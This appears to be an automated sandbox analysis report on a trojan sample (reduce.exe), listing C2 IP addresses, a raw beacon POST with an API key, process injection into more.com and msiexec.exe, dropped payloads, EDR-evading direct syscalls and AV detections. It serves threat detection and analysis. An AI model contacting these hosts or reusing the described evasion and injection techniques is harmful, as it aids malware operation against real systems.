    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 38.180.205.164
    Source: unknownTCP traffic detected without corresponding DNS query: 38.180.205.164
    Source: unknownTCP traffic detected without corresponding DNS query: 38.180.205.164
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknownTCP traffic detected without corresponding DNS query: 38.180.205.164
    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknownTCP traffic detected without corresponding DNS query: 38.180.205.164
    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknownTCP traffic detected without corresponding DNS query: 38.180.205.164
    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 46.8.232.106User-Agent: Go-http-client/1.1Content-Length: 166X-Api-Key: RevesNFjAccept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2e 36 58 01 2b 23 33 31 3c 1b 15 0d 0a 20 0a 2b 07 19 02 0f 1d 27 1e 28 13 35 3f 27 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 0a 22 12 23 16 09 01 32 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 2c 5e 2b 0e 14 09 1e 1b 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 59 10 27 41 2d 23 2c 54 2a 37 37 44 45 45 0e 0b 5b 44 53 45 5a 0b 5e 5f 0d 04 52 0a 0a 07 5e 53 56 0e 5b 00 51 50 56 5a 5d 56 5d 5f 06 5a 59 50 5b 57 00 09 4c 1b Data Ascii: M*L\K.6X+#31< +'(5?'DEE2MTD"#2ACL>K]A,^+DEE1AULVY'A-#,T*77DEE[DSEZ^_R^SV[QPVZ]V]_ZYP[WL
    Source: msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243
    Source: msiexec.exe, 00000007.00000002.2956257148.000000000ED96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.24338.180.205.164:80P&
    Source: msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://38.180.205.164
    Source: msiexec.exe, 00000007.00000002.2956126032.000000000ED0C000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://38.180.205.164http://46.8.232.106
    Source: msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106
    Source: msiexec.exe, 00000007.00000002.2955110668.000000000EC7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106P.
    Source: msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61
    Source: msiexec.exe, 00000007.00000002.2955110668.000000000EC96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61P
    Source: msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91
    Source: reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
    Source: reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
    Source: reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
    Source: reduce.exe, 00000000.00000002.1718553599.0000000009496000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2006666674.0000000004852000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2953875021.0000000005771000.00000004.00000800.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1991442213.000000000946E000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214539573.0000000004AEB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2216585430.0000000004BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
    Source: reduce.exe, 00000000.00000002.1720577037.00000001010CC000.00000008.00000001.01000000.00000003.sdmp, reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000000.1958521441.00000001010CC000.00000008.00000001.01000000.0000000B.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jbsolucoes/ucp
    Source: reduce.exeString found in binary or memory: https://home.hccnet.nl/s.j.francke/colorcatcher/index.html
    Source: reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
    Source: reduce.exeString found in binary or memory: https://www.freepascal.org/
    Source: reduce.exeString found in binary or memory: https://www.lazarus-ide.org/
    Source: reduce.exeStatic PE information: invalid certificate
    Source: reduce.exe, 00000000.00000002.1720577037.00000001010CC000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameD vs reduce.exe
    Source: reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameD vs reduce.exe
    Source: reduce.exe, 00000000.00000002.1717772547.0000000007E16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs reduce.exe
    Source: reduce.exe, 00000000.00000002.1717514430.0000000007A0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs reduce.exe
    Source: classification engineClassification label: mal100.troj.evad.winEXE@12/8@0/6
    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Roaming\jionJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
    Source: C:\Users\user\Desktop\reduce.exeFile created: C:\Users\user\AppData\Local\Temp\16ad20e3Jump to behavior
    Source: reduce.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\more.comFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\reduce.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: reduce.exeString found in binary or memory: <!--StartFragment-->
    Source: Client32.exeString found in binary or memory: <!--StartFragment-->
    Source: reduce.exeString found in binary or memory: <!--StartFragment-->
    Source: C:\Users\user\Desktop\reduce.exeFile read: C:\Users\user\Desktop\reduce.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\reduce.exe "C:\Users\user\Desktop\reduce.exe"
    Source: C:\Users\user\Desktop\reduce.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\jion\Client32.exe "C:\Users\user\AppData\Roaming\jion\Client32.exe"
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
    Source: C:\Users\user\Desktop\reduce.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
    Source: C:\Users\user\Desktop\reduce.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\reduce.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\reduce.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\reduce.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\reduce.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\reduce.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\reduce.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\reduce.exeSection loaded: shdocvw.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: bitsproxy.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeSection loaded: shdocvw.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
    Source: C:\Windows\SysWOW64\more.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32Jump to behavior
    Source: ivmfgila.1.drLNK file: ..\..\Roaming\jion\Client32.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: reduce.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: reduce.exeStatic PE information: Image base 0x100000000 > 0x60000000
    Source: reduce.exeStatic file information: File size 18233144 > 1048576
    Source: reduce.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x5e4a00
    Source: reduce.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2e8400
    Source: reduce.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x7b4200
    Source: Binary string: ntdll.pdb source: reduce.exe, 00000000.00000002.1717960380.0000000008094000.00000004.00000001.00020000.00000000.sdmp, reduce.exe, 00000000.00000002.1717772547.0000000007C90000.00000004.00000800.00020000.00000000.sdmp, reduce.exe, 00000000.00000002.1717514430.0000000007894000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990504856.0000000007863000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990846904.000000000816B000.00000004.00000001.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990644776.0000000007C60000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdbUGP source: more.com, 00000001.00000002.2006505480.00000000044F3000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2007201023.0000000005040000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2954644321.0000000005F60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2953692888.000000000541E000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214422504.0000000004782000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214963020.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2216464873.0000000004851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2217032269.00000000053B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: ntdll.pdbUGP source: reduce.exe, 00000000.00000002.1717960380.0000000008094000.00000004.00000001.00020000.00000000.sdmp, reduce.exe, 00000000.00000002.1717772547.0000000007C90000.00000004.00000800.00020000.00000000.sdmp, reduce.exe, 00000000.00000002.1717514430.0000000007894000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990504856.0000000007863000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990846904.000000000816B000.00000004.00000001.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990644776.0000000007C60000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: more.com, 00000001.00000002.2006505480.00000000044F3000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2007201023.0000000005040000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2954644321.0000000005F60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2953692888.000000000541E000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214422504.0000000004782000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214963020.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2216464873.0000000004851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2217032269.00000000053B0000.00000004.00001000.00020000.00000000.sdmp
    Source: kupcq.1.drStatic PE information: section name: .symtab
    Source: kupcq.1.drStatic PE information: section name: fwjua
    Source: nfabo.9.drStatic PE information: section name: .symtab
    Source: nfabo.9.drStatic PE information: section name: fwjua
    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\nfaboJump to dropped file
    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\kupcqJump to dropped file
    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\kupcqJump to dropped file
    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\nfaboJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\KUPCQ
    Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\NFABO
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Windows\SysWOW64\more.comAPI/Special instruction interceptor: Address: 75DA3B54
    Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 9BBC87
    Source: C:\Windows\SysWOW64\more.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nfaboJump to dropped file
    Source: C:\Windows\SysWOW64\more.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kupcqJump to dropped file
    Source: C:\Users\user\Desktop\reduce.exeAPI coverage: 0.0 %
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeAPI coverage: 0.0 %
    Source: msiexec.exe, 00000007.00000002.2953627209.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\reduce.exeProcess information queried: ProcessInformationJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\Desktop\reduce.exeNtProtectVirtualMemory: Direct from: 0x9502151Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtProtectVirtualMemory: Direct from: 0x4D90150Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtProtectVirtualMemory: Direct from: 0xB28786873Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtProtectVirtualMemory: Direct from: 0x18710Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtAllocateVirtualMemory: Direct from: 0x4D90050Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtClose: Direct from: 0xB20000B2
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtAllocateVirtualMemory: Direct from: 0x7FFE217260D4Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtProtectVirtualMemory: Direct from: 0x8062EC0Jump to behavior
    Source: C:\Users\user\Desktop\reduce.exeNtCreateFile: Direct from: 0x270Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtClose: Direct from: 0x150
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtQuerySystemInformation: Direct from: 0x7FFE21726118Jump to behavior
    Source: C:\Users\user\Desktop\reduce.exeNtReadFile: Direct from: 0x254Jump to behavior
    Source: C:\Users\user\Desktop\reduce.exeNtProtectVirtualMemory: Direct from: 0x6880150Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtReadFile: Direct from: 0x218Jump to behavior
    Source: C:\Users\user\Desktop\reduce.exeNtAllocateVirtualMemory: Direct from: 0x6880050Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtClose: Direct from: 0x7FFE2172CDF8
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtCreateFile: Direct from: 0x27CJump to behavior
    Source: C:\Users\user\Desktop\reduce.exeNtProtectVirtualMemory: Direct from: 0x7F92EC0Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtProtectVirtualMemory: Direct from: 0x94DA151Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtReadFile: Direct from: 0x1EF590Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtAllocateVirtualMemory: Direct from: 0x7FFE21738E14Jump to behavior
    Source: C:\Users\user\Desktop\reduce.exeNtProtectVirtualMemory: Direct from: 0xB184566DBJump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtCreateFile: Direct from: 0x80Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtDelayExecution: Direct from: 0x13FE280Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeNtAllocateVirtualMemory: Direct from: 0x40Jump to behavior
    Source: C:\Users\user\Desktop\reduce.exeSection loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeSection loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read writeJump to behavior
    Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\msiexec.exe base: 9B9330Jump to behavior
    Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2F8F008Jump to behavior
    Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\msiexec.exe base: 9B9330Jump to behavior
    Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\msiexec.exe base: 545008Jump to behavior
    Source: C:\Users\user\Desktop\reduce.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
    Source: reduce.exeBinary or memory string: Shell_TrayWnd
    Source: reduce.exeBinary or memory string: ToolbarWindow32Shell_TrayWnd
    Source: C:\Users\user\Desktop\reduce.exeQueries volume information: C:\Users\user\AppData\Local\Temp\16ad20e3 VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\more.comQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\27142db2 VolumeInformationJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8024, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8024, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter
    11
    DLL Side-Loading
    212
    Process Injection
    11
    Masquerading
    OS Credential Dumping21
    Security Software Discovery
    Remote ServicesData from Local System1
    Non-Standard Port
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Abuse Elevation Control Mechanism
    212
    Process Injection
    LSASS Memory2
    Process Discovery
    Remote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
    DLL Side-Loading
    1
    Abuse Elevation Control Mechanism
    Security Account Manager1
    File and Directory Discovery
    SMB/Windows Admin SharesData from Network Shared Drive1
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
    DLL Side-Loading
    NTDS111
    System Information Discovery
    Distributed Component Object ModelInput Capture1
    Proxy
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1568776 Sample: reduce.exe Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 38 Suricata IDS alerts for network traffic 2->38 40 Antivirus detection for dropped file 2->40 42 Multi AV Scanner detection for dropped file 2->42 44 3 other signatures 2->44 7 reduce.exe 2 2->7         started        10 Client32.exe 2 2->10         started        process3 signatures4 50 Maps a DLL or memory area into another process 7->50 52 Found direct / indirect Syscall (likely to bypass EDR) 7->52 12 more.com 5 7->12         started        16 more.com 2 10->16         started        process5 file6 28 C:\Users\user\AppData\Local\Temp\kupcq, PE32 12->28 dropped 54 Found Tor onion address 12->54 56 Writes to foreign memory regions 12->56 58 Found hidden mapped module (file has been removed from disk) 12->58 60 Switches to a custom stack to bypass stack traces 12->60 18 msiexec.exe 1 12->18         started        22 conhost.exe 12->22         started        30 C:\Users\user\AppData\Local\Temp\nfabo, PE32 16->30 dropped 24 msiexec.exe 16->24         started        26 conhost.exe 16->26         started        signatures7 process8 dnsIp9 32 185.121.233.152, 28250, 49763 IPCORE-ASES Spain 18->32 34 188.130.206.243, 49744, 80 SVINT-ASNES Russian Federation 18->34 36 4 other IPs or domains 18->36 46 Found Tor onion address 18->46 48 Switches to a custom stack to bypass stack traces 18->48 signatures10

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    reduce.exe0%ReversingLabs
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\kupcq100%AviraTR/Crypt.XPACK.Gen
    C:\Users\user\AppData\Local\Temp\nfabo100%AviraTR/Crypt.XPACK.Gen
    C:\Users\user\AppData\Local\Temp\kupcq47%ReversingLabsWin32.Trojan.Ghostsocks
